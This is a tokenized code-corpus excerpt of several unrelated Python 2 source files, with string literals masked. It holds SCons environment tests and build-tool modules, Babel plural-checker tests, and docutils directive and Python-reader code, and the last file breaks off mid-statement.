<EOL> x = env3 . File ( '<STR_LIT>' ) <EOL> assert self . checkpath ( x , '<STR_LIT>' ) , str ( x ) <EOL> def test_Split ( self ) : <EOL> """<STR_LIT>""" <EOL> env , env2 , env3 = self . envs <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> x = env . 
Split ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT:x>' , '<STR_LIT:y>' ] , x <EOL> x = env2 . Split ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT:y>' ] , x <EOL> x = env3 . Split ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> def test_parse_flags ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = SubstitutionEnvironment ( ) <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( CCFLAGS = None ) <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert env [ '<STR_LIT>' ] is None , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> env = SubstitutionEnvironment ( CPPDEFINES = '<STR_LIT>' ) <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert not env . has_key ( '<STR_LIT>' ) <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env2 [ '<STR_LIT>' ] <EOL> class NoSubstitutionProxyTestCase ( unittest . TestCase , TestEnvironmentFixture ) : <EOL> def test___init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . 
TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> def test_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> setattr ( env , '<STR_LIT>' , '<STR_LIT>' ) <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> setattr ( proxy , '<STR_LIT>' , '<STR_LIT>' ) <EOL> x = getattr ( env , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = getattr ( proxy , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = getattr ( env , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = getattr ( proxy , '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_subst ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> x = env . subst ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT:x>' , x <EOL> x = proxy . subst ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = proxy . subst ( '<STR_LIT>' , raw = <NUM_LIT:7> , target = None , source = None , <EOL> conv = None , <EOL> extra_meaningless_keyword_argument = None ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_subst_kw ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . 
TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> x = env . subst_kw ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert x == { '<STR_LIT:x>' : '<STR_LIT:y>' } , x <EOL> x = proxy . subst_kw ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert x == { '<STR_LIT>' : '<STR_LIT>' } , x <EOL> def test_subst_list ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> x = env . subst_list ( '<STR_LIT>' ) <EOL> assert x == [ [ '<STR_LIT:x>' ] ] , x <EOL> x = proxy . subst_list ( '<STR_LIT>' ) <EOL> assert x == [ [ ] ] , x <EOL> x = proxy . subst_list ( '<STR_LIT>' , raw = <NUM_LIT:0> , target = None , source = None , conv = None ) <EOL> assert x == [ [ ] ] , x <EOL> def test_subst_target_source ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . 
TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:y>' , env [ '<STR_LIT>' ] <EOL> proxy = NoSubstitutionProxy ( env ) <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:x>' , proxy [ '<STR_LIT>' ] <EOL> assert proxy [ '<STR_LIT>' ] == '<STR_LIT:y>' , proxy [ '<STR_LIT>' ] <EOL> args = ( '<STR_LIT>' , ) <EOL> kw = { '<STR_LIT:target>' : DummyNode ( '<STR_LIT>' ) , '<STR_LIT:source>' : DummyNode ( '<STR_LIT>' ) } <EOL> x = apply ( env . subst_target_source , args , kw ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = apply ( proxy . subst_target_source , args , kw ) <EOL> assert x == '<STR_LIT>' , x <EOL> class EnvironmentVariableTestCase ( unittest . TestCase ) : <EOL> def test_is_valid_construction_var ( self ) : <EOL> """<STR_LIT>""" <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert not r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT:/>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> r = is_valid_construction_var ( "<STR_LIT>" ) <EOL> assert r is None , r <EOL> 
if __name__ == "<STR_LIT:__main__>" : <EOL> suite = unittest . TestSuite ( ) <EOL> tclasses = [ SubstitutionTestCase , <EOL> BaseTestCase , <EOL> OverrideEnvironmentTestCase , <EOL> NoSubstitutionProxyTestCase , <EOL> EnvironmentVariableTestCase ] <EOL> for tclass in tclasses : <EOL> names = unittest . getTestCaseNames ( tclass , '<STR_LIT>' ) <EOL> suite . addTests ( map ( tclass , names ) ) <EOL> if not unittest . TextTestRunner ( ) . run ( suite ) . wasSuccessful ( ) : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import SCons <EOL> from SCons . Tool . install import copyFunc <EOL> copyToBuilder , copyAsBuilder = None , None <EOL> def copyto_emitter ( target , source , env ) : <EOL> """<STR_LIT>""" <EOL> n_target = [ ] <EOL> for t in target : <EOL> n_target = n_target + map ( lambda s , t = t : t . File ( str ( s ) ) , source ) <EOL> return ( n_target , source ) <EOL> def copy_action_func ( target , source , env ) : <EOL> assert ( len ( target ) == len ( source ) ) , "<STR_LIT>" % ( map ( str , target ) , map ( str , source ) ) <EOL> for t , s in zip ( target , source ) : <EOL> if copyFunc ( t . get_path ( ) , s . get_path ( ) , env ) : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def copy_action_str ( target , source , env ) : <EOL> return env . subst_target_source ( env [ '<STR_LIT>' ] , <NUM_LIT:0> , target , source ) <EOL> copy_action = SCons . Action . Action ( copy_action_func , copy_action_str ) <EOL> def generate ( env ) : <EOL> try : <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> except KeyError , e : <EOL> global copyToBuilder <EOL> if copyToBuilder is None : <EOL> copyToBuilder = SCons . Builder . Builder ( <EOL> action = copy_action , <EOL> target_factory = env . fs . Dir , <EOL> source_factory = env . fs . Entry , <EOL> multi = <NUM_LIT:1> , <EOL> emitter = [ copyto_emitter , ] ) <EOL> global copyAsBuilder <EOL> if copyAsBuilder is None : <EOL> copyAsBuilder = SCons . Builder . Builder ( <EOL> action = copy_action , <EOL> target_factory = env . fs . Entry , <EOL> source_factory = env . fs . Entry ) <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = copyToBuilder <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = copyAsBuilder <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def exists ( env ) : <EOL> return <NUM_LIT:1> </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import SCons . Action <EOL> import SCons . Builder <EOL> import SCons . Util <EOL> def generate ( env ) : <EOL> """<STR_LIT>""" <EOL> M4Action = SCons . Action . Action ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> bld = SCons . Builder . Builder ( action = M4Action , src_suffix = '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = bld <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def exists ( env ) : <EOL> return env . Detect ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> from SCons . Builder import Builder <EOL> import SCons . Util <EOL> cmd = "<STR_LIT>" <EOL> rpcgen_client = cmd % ( '<STR_LIT:l>' , '<STR_LIT>' ) <EOL> rpcgen_header = cmd % ( '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> rpcgen_service = cmd % ( '<STR_LIT:m>' , '<STR_LIT>' ) <EOL> rpcgen_xdr = cmd % ( '<STR_LIT:c>' , '<STR_LIT>' ) <EOL> def generate ( env ) : <EOL> "<STR_LIT>" <EOL> client = Builder ( action = rpcgen_client , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> header = Builder ( action = rpcgen_header , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> service = Builder ( action = rpcgen_service , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> xdr = Builder ( action = rpcgen_xdr , suffix = '<STR_LIT>' , src_suffix = '<STR_LIT>' ) <EOL> env . Append ( BUILDERS = { '<STR_LIT>' : client , <EOL> '<STR_LIT>' : header , <EOL> '<STR_LIT>' : service , <EOL> '<STR_LIT>' : xdr } ) <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> env [ '<STR_LIT>' ] = SCons . Util . CLVar ( '<STR_LIT>' ) <EOL> def exists ( env ) : <EOL> return env . Detect ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> __all__ = [ '<STR_LIT>' , ] <EOL> import os <EOL> import os . path <EOL> import SCons . Errors <EOL> class _PathVariableClass : <EOL> def PathAccept ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def PathIsDir ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isdir ( val ) : <EOL> if os . path . isfile ( val ) : <EOL> m = '<STR_LIT>' <EOL> else : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> def PathIsDirCreate ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( val ) : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> if not os . path . isdir ( val ) : <EOL> os . makedirs ( val ) <EOL> def PathIsFile ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( val ) : <EOL> if os . path . isdir ( val ) : <EOL> m = '<STR_LIT>' <EOL> else : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> def PathExists ( self , key , val , env ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( val ) : <EOL> m = '<STR_LIT>' <EOL> raise SCons . Errors . UserError ( m % ( key , val ) ) <EOL> def __call__ ( self , key , help , default , validator = None ) : <EOL> """<STR_LIT>""" <EOL> if validator is None : <EOL> validator = self . PathExists <EOL> if SCons . Util . is_List ( key ) or SCons . Util . is_Tuple ( key ) : <EOL> return ( key , '<STR_LIT>' % ( help , key [ <NUM_LIT:0> ] ) , default , <EOL> validator , None ) <EOL> else : <EOL> return ( key , '<STR_LIT>' % ( help , key ) , default , <EOL> validator , None ) <EOL> PathVariable = _PathVariableClass ( ) </s>
<s> from datetime import datetime <EOL> import time <EOL> import unittest <EOL> from StringIO import StringIO <EOL> from babel import __version__ as VERSION <EOL> from babel . core import Locale , UnknownLocaleError <EOL> from babel . dates import format_datetime <EOL> from babel . messages import checkers <EOL> from babel . messages . plurals import PLURALS <EOL> from babel . messages . pofile import read_po <EOL> from babel . util import LOCALTZ <EOL> class CheckersTestCase ( unittest . TestCase ) : <EOL> def test_1_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:1> ] : <EOL> try : <EOL> locale = Locale . parse ( _locale ) <EOL> except UnknownLocaleError : <EOL> continue <EOL> po_file = ( ur """<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = locale . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_2_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:2> ] : <EOL> if _locale in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> _locale = '<STR_LIT>' <EOL> num_plurals = PLURALS [ _locale . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] ] [ <NUM_LIT:0> ] <EOL> plural_expr = PLURALS [ _locale . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] ] [ <NUM_LIT:1> ] <EOL> else : <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:1> ] <EOL> try : <EOL> locale = Locale ( _locale ) <EOL> date = format_datetime ( datetime . 
now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) <EOL> except UnknownLocaleError : <EOL> continue <EOL> po_file = ( ur """<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = locale . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = date , <EOL> num_plurals = num_plurals , <EOL> plural_expr = plural_expr ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_3_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:3> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_4_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:4> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . 
now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_5_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:5> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def test_6_num_plurals_checkers ( self ) : <EOL> for _locale in [ p for p in PLURALS if PLURALS [ p ] [ <NUM_LIT:0> ] == <NUM_LIT:6> ] : <EOL> po_file = r"""<STR_LIT>""" % dict ( locale = _locale , <EOL> english_name = Locale . parse ( _locale ) . english_name , <EOL> version = VERSION , <EOL> year = time . strftime ( '<STR_LIT>' ) , <EOL> date = format_datetime ( datetime . now ( LOCALTZ ) , <EOL> '<STR_LIT>' , <EOL> tzinfo = LOCALTZ , locale = _locale ) , <EOL> num_plurals = PLURALS [ _locale ] [ <NUM_LIT:0> ] , <EOL> plural_expr = PLURALS [ _locale ] [ <NUM_LIT:0> ] ) <EOL> catalog = read_po ( StringIO ( po_file ) , _locale ) <EOL> message = catalog [ '<STR_LIT>' ] <EOL> checkers . num_plurals ( catalog , message ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . 
makeSuite ( CheckersTestCase ) ) <EOL> return suite <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( defaultTest = '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> from docutils import nodes , languages <EOL> from docutils . transforms import parts <EOL> from docutils . parsers . rst import Directive <EOL> from docutils . parsers . rst import directives <EOL> class Contents ( Directive ) : <EOL> """<STR_LIT>""" <EOL> backlinks_values = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:none>' ) <EOL> def backlinks ( arg ) : <EOL> value = directives . choice ( arg , Contents . backlinks_values ) <EOL> if value == '<STR_LIT:none>' : <EOL> return None <EOL> else : <EOL> return value <EOL> required_arguments = <NUM_LIT:0> <EOL> optional_arguments = <NUM_LIT:1> <EOL> final_argument_whitespace = True <EOL> option_spec = { '<STR_LIT>' : directives . nonnegative_int , <EOL> '<STR_LIT>' : directives . flag , <EOL> '<STR_LIT>' : backlinks , <EOL> '<STR_LIT:class>' : directives . class_option } <EOL> def run ( self ) : <EOL> if not ( self . state_machine . match_titles <EOL> or isinstance ( self . state_machine . node , nodes . sidebar ) ) : <EOL> raise self . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . name ) <EOL> document = self . state_machine . document <EOL> language = languages . get_language ( document . settings . language_code ) <EOL> if self . arguments : <EOL> title_text = self . arguments [ <NUM_LIT:0> ] <EOL> text_nodes , messages = self . state . inline_text ( title_text , <EOL> self . lineno ) <EOL> title = nodes . title ( title_text , '<STR_LIT>' , * text_nodes ) <EOL> else : <EOL> messages = [ ] <EOL> if '<STR_LIT>' in self . options : <EOL> title = None <EOL> else : <EOL> title = nodes . title ( '<STR_LIT>' , language . labels [ '<STR_LIT>' ] ) <EOL> topic = nodes . topic ( classes = [ '<STR_LIT>' ] ) <EOL> topic [ '<STR_LIT>' ] += self . options . get ( '<STR_LIT:class>' , [ ] ) <EOL> if '<STR_LIT>' in self . options : <EOL> topic [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> if title : <EOL> name = title . 
astext ( ) <EOL> topic += title <EOL> else : <EOL> name = language . labels [ '<STR_LIT>' ] <EOL> name = nodes . fully_normalize_name ( name ) <EOL> if not document . has_name ( name ) : <EOL> topic [ '<STR_LIT>' ] . append ( name ) <EOL> document . note_implicit_target ( topic ) <EOL> pending = nodes . pending ( parts . Contents , rawsource = self . block_text ) <EOL> pending . details . update ( self . options ) <EOL> document . note_pending ( pending ) <EOL> topic += pending <EOL> return [ topic ] + messages <EOL> class Sectnum ( Directive ) : <EOL> """<STR_LIT>""" <EOL> option_spec = { '<STR_LIT>' : int , <EOL> '<STR_LIT:start>' : int , <EOL> '<STR_LIT>' : directives . unchanged_required , <EOL> '<STR_LIT>' : directives . unchanged_required } <EOL> def run ( self ) : <EOL> pending = nodes . pending ( parts . SectNum ) <EOL> pending . details . update ( self . options ) <EOL> self . state_machine . document . note_pending ( pending ) <EOL> return [ pending ] <EOL> class Header ( Directive ) : <EOL> """<STR_LIT>""" <EOL> has_content = True <EOL> def run ( self ) : <EOL> self . assert_has_content ( ) <EOL> header = self . state_machine . document . get_decoration ( ) . get_header ( ) <EOL> self . state . nested_parse ( self . content , self . content_offset , header ) <EOL> return [ ] <EOL> class Footer ( Directive ) : <EOL> """<STR_LIT>""" <EOL> has_content = True <EOL> def run ( self ) : <EOL> self . assert_has_content ( ) <EOL> footer = self . state_machine . document . get_decoration ( ) . get_footer ( ) <EOL> self . state . nested_parse ( self . content , self . content_offset , footer ) <EOL> return [ ] </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> import sys <EOL> import compiler <EOL> import compiler . ast <EOL> import tokenize <EOL> import token <EOL> from compiler . consts import OP_ASSIGN <EOL> from compiler . visitor import ASTVisitor <EOL> from docutils . readers . python import pynodes <EOL> from docutils . nodes import Text <EOL> def parse_module ( module_text , filename ) : <EOL> """<STR_LIT>""" <EOL> ast = compiler . parse ( module_text ) <EOL> token_parser = TokenParser ( module_text ) <EOL> visitor = ModuleVisitor ( filename , token_parser ) <EOL> compiler . walk ( ast , visitor , walker = visitor ) <EOL> return visitor . module <EOL> class BaseVisitor ( ASTVisitor ) : <EOL> def __init__ ( self , token_parser ) : <EOL> ASTVisitor . __init__ ( self ) <EOL> self . token_parser = token_parser <EOL> self . context = [ ] <EOL> self . documentable = None <EOL> def default ( self , node , * args ) : <EOL> self . documentable = None <EOL> def default_visit ( self , node , * args ) : <EOL> ASTVisitor . default ( self , node , * args ) <EOL> class DocstringVisitor ( BaseVisitor ) : <EOL> def visitDiscard ( self , node ) : <EOL> if self . documentable : <EOL> self . visit ( node . expr ) <EOL> def visitConst ( self , node ) : <EOL> if self . documentable : <EOL> if type ( node . value ) in ( str , unicode ) : <EOL> self . documentable . append ( make_docstring ( node . value , node . lineno ) ) <EOL> else : <EOL> self . documentable = None <EOL> def visitStmt ( self , node ) : <EOL> self . default_visit ( node ) <EOL> class AssignmentVisitor ( DocstringVisitor ) : <EOL> def visitAssign ( self , node ) : <EOL> visitor = AttributeVisitor ( self . token_parser ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> if visitor . attributes : <EOL> self . context [ - <NUM_LIT:1> ] . extend ( visitor . attributes ) <EOL> if len ( visitor . attributes ) == <NUM_LIT:1> : <EOL> self . documentable = visitor . 
attributes [ <NUM_LIT:0> ] <EOL> else : <EOL> self . documentable = None <EOL> class ModuleVisitor ( AssignmentVisitor ) : <EOL> def __init__ ( self , filename , token_parser ) : <EOL> AssignmentVisitor . __init__ ( self , token_parser ) <EOL> self . filename = filename <EOL> self . module = None <EOL> def visitModule ( self , node ) : <EOL> self . module = module = pynodes . module_section ( ) <EOL> module [ '<STR_LIT:filename>' ] = self . filename <EOL> append_docstring ( module , node . doc , node . lineno ) <EOL> self . context . append ( module ) <EOL> self . documentable = module <EOL> self . visit ( node . node ) <EOL> self . context . pop ( ) <EOL> def visitImport ( self , node ) : <EOL> self . context [ - <NUM_LIT:1> ] += make_import_group ( names = node . names , <EOL> lineno = node . lineno ) <EOL> self . documentable = None <EOL> def visitFrom ( self , node ) : <EOL> self . context [ - <NUM_LIT:1> ] . append ( <EOL> make_import_group ( names = node . names , from_name = node . modname , <EOL> lineno = node . lineno ) ) <EOL> self . documentable = None <EOL> def visitFunction ( self , node ) : <EOL> visitor = FunctionVisitor ( self . token_parser , <EOL> function_class = pynodes . function_section ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> self . context [ - <NUM_LIT:1> ] . append ( visitor . function ) <EOL> def visitClass ( self , node ) : <EOL> visitor = ClassVisitor ( self . token_parser ) <EOL> compiler . walk ( node , visitor , walker = visitor ) <EOL> self . context [ - <NUM_LIT:1> ] . append ( visitor . klass ) <EOL> class AttributeVisitor ( BaseVisitor ) : <EOL> def __init__ ( self , token_parser ) : <EOL> BaseVisitor . __init__ ( self , token_parser ) <EOL> self . attributes = pynodes . class_attribute_section ( ) <EOL> def visitAssign ( self , node ) : <EOL> for child in node . nodes : <EOL> self . dispatch ( child ) <EOL> expression_text = self . token_parser . rhs ( node . lineno ) <EOL> expression = pynodes . 
